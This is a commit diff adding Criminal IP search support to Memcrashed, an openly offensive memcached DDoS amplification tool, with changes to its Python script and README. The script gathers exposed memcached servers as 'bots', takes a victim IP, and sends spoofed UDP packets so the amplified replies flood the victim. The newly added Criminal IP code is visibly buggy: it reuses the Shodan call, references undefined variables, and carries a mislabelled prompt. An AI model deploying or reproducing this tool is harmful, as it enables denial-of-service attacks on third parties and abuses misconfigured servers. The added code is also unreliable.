Criminalip Module add

Memcrashed.py

@@ -1,6 +1,6 @@
 #-- coding: utf8 --
 #!/usr/bin/env python3
-import sys, os, time, shodan
+import sys, os, time, shodan, requests
 from pathlib import Path
 from scapy.all import *
 from contextlib import contextmanager, redirect_stdout
@@ -27,51 +27,86 @@ class color:
    ╚═╝     ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
 
                                         Author: @037
+                                        Support: @Parkjunmin
                                         Version: 4.0
 
-####################################### DISCLAIMER ########################################
-| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable  |
-| memcached servers. It then allows you to use the same servers to launch widespread      |
-| distributed denial of service attacks by forging UDP packets sourced to your victim.    |
-| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
-| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly.   |
-| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
-###########################################################################################
+####################################### DISCLAIMER #######################################################
+| Memcrashed is a tool that allows you to use Criminalip.io, Shodan.io to obtain hundreds of vulnerable  |
+| memcached servers. It then allows you to use the same servers to launch widespread                     |
+| distributed denial of service attacks by forging UDP packets sourced to your victim.                   |
+| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply                |
+| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly.                  |
+| I am NOT responsible for any damages caused or any crimes committed by using this tool.                |
+##########################################################################################################
 
 '''
 print(logo)
 
 if keys.is_file():
-    with open('api.txt', 'r') as file:
+    with open('Shodan_api.txt', 'r') as file:
         SHODAN_API_KEY=file.readline().rstrip('\n')
 else:
-    file = open('api.txt', 'w')
+    file = open('Shodan_api.txt', 'w')
     SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ')
     file.write(SHODAN_API_KEY)
-    print('[~] File written: ./api.txt')
+    print('[~] File written: ./shodan_api.txt')
     file.close()
 
+if keys.is_file():
+    with open('Criminalip_api.txt', 'r') as file:
+        Criminalip_API_KEY=file.readline().rstrip('\n')
+else:
+    file = open('Criminalip_api.txt', 'w')
+    Criminalip_API_KEY = input('[*] Please enter a valid Criminalip.io API Key: ')
+    file.write(Criminalip_API_KEY)
+    print('[~] File written: ./Criminalip_api.txt')
+    file.close()
+
 while True:
-    api = shodan.Shodan(SHODAN_API_KEY)
+    shodan_api = shodan.Shodan(SHODAN_API_KEY)
     print('')
-    try:
+    try: # Criminalip_API_KEY
         myresults = Path("./bots.txt")
-        query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower()
-        if query.startswith('y'):
+        shodan_query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower()
+        if shodan_query.startswith('y'):
             print('')
             print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
-            results = api.search('product:"Memcached" port:11211')
+            shodan_results = shodan_api.search('product:"Memcached" port:11211')
+            criminalip_results = shodan_api.search('product:"Memcached" port:11211')
             print('[✓] API Key Authentication: SUCCESS')
-            print('[~] Number of bots: %s' % results['total'])
+            print('[~] Number of bots: %s' % shodan_results['total'])
             print('')
             saveresult = input("[*] Save results for later usage? <Y/n>: ").lower()
+
             if saveresult.startswith('y'):
                 file2 = open('bots.txt', 'a')
-                for result in results['matches']:
+                for result in shodan_results['matches']:
                     file2.write(result['ip_str'] + "\n")
                 print('[~] File written: ./bots.txt')
                 print('')
                 file2.close()
+
+        criminalip_query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower()
+        if criminalip_query.startswith('y'):
+            print('')
+            print('[~] Checking Criminalip.io API Key: %s' % Criminalip_API_KEY)
+            criminalip_results = "https://api.criminalip.io/v1/banner/search?query="
+            data = {"query":'product:"Memcached" port:11211'}
+            result_cip = json.loads(requests.request("GET", url, headers=headers, data=data).text)['data']['result']
+
+
+            print('[✓] API Key Authentication: SUCCESS')
+            print('[~] Number of bots: %s' % len(result_cip))
+            print('')
+            saveresult = input("[*] Save results for later usage? <Y/n>: ").lower()
+
+            if saveresult.startswith('y'):
+                file2 = open('bots.txt', 'a')
+                for i in range(len(result_cip)):
+                    file2.write(result_cip[i]['ip_address'])
+                print('[~] File written: ./bots.txt')
+                print('')
+                file2.close()        
         saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower()
         if myresults.is_file():
             if saveme.startswith('y'):
@@ -81,7 +116,7 @@ class color:
             print('')
             print('[✘] Error: No bots stored locally, bots.txt file not found!')
             print('')
-        if saveme.startswith('y') or query.startswith('y'):
+        if saveme.startswith('y') or shodan_query.startswith('y'):
             print('')
             target = input("[▸] Enter target IP address: ")
             targetport = input("[▸] Enter target port number (Default 80): ") or "80"
@@ -94,7 +129,7 @@ class color:
                 getdata = ("\x00\x00\x00\x00\x00\x00\x00\x00get\x00injected\r\n")
                 print("[+] Payload transformed: ", dataset)
             print('')
-            if query.startswith('y'):
+            if shodan_query.startswith('y'):
                 iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower()
                 if iplist.startswith('y'):
                     print('')

README.md

@@ -2,7 +2,7 @@
 
 * Author: [@037](https://twitter.com/037)
 
-This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io
+This tool allows you to send forged UDP packets to Memcached servers obtained from Criminalip.io, Shodan.io
 
 ### Prerequisites
 
@@ -13,6 +13,7 @@ apt-get install python3
 ```
 
 You also require to have Scapy and Shodan modules installed
+Criminalip shares this method because the Python library does not currently exist and it can be called directly from the API.
 ```
 pip install scapy
 ```
@@ -25,7 +26,7 @@ pip install shodan
 
 This tool requires you to own an upgraded Shodan API
 
-You may obtain one for free in [Shodan](https://shodan.io/) if you sign up using a .edu email
+You may obtain one for free in [Criminalip](https://www.criminalip.io/), [Shodan](https://shodan.io/) if you sign up using a .edu email
 
 ![alt text](https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/master/2.png)
 ![alt text](https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/master/1.png)
@@ -44,7 +45,8 @@ You may deploy this tool to the cloud using a light Alpine Docker image.
 ```bash
 git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
 cd Memcrashed-DDoS-Exploit
-echo "SHODAN_KEY" > api.txt
+echo "SHODAN_KEY" > Shodan_api.txt
+echo "Criminalip_KEY" > Criminalip_api.txt
 docker build -t memcrashed .
 docker run -it memcrashed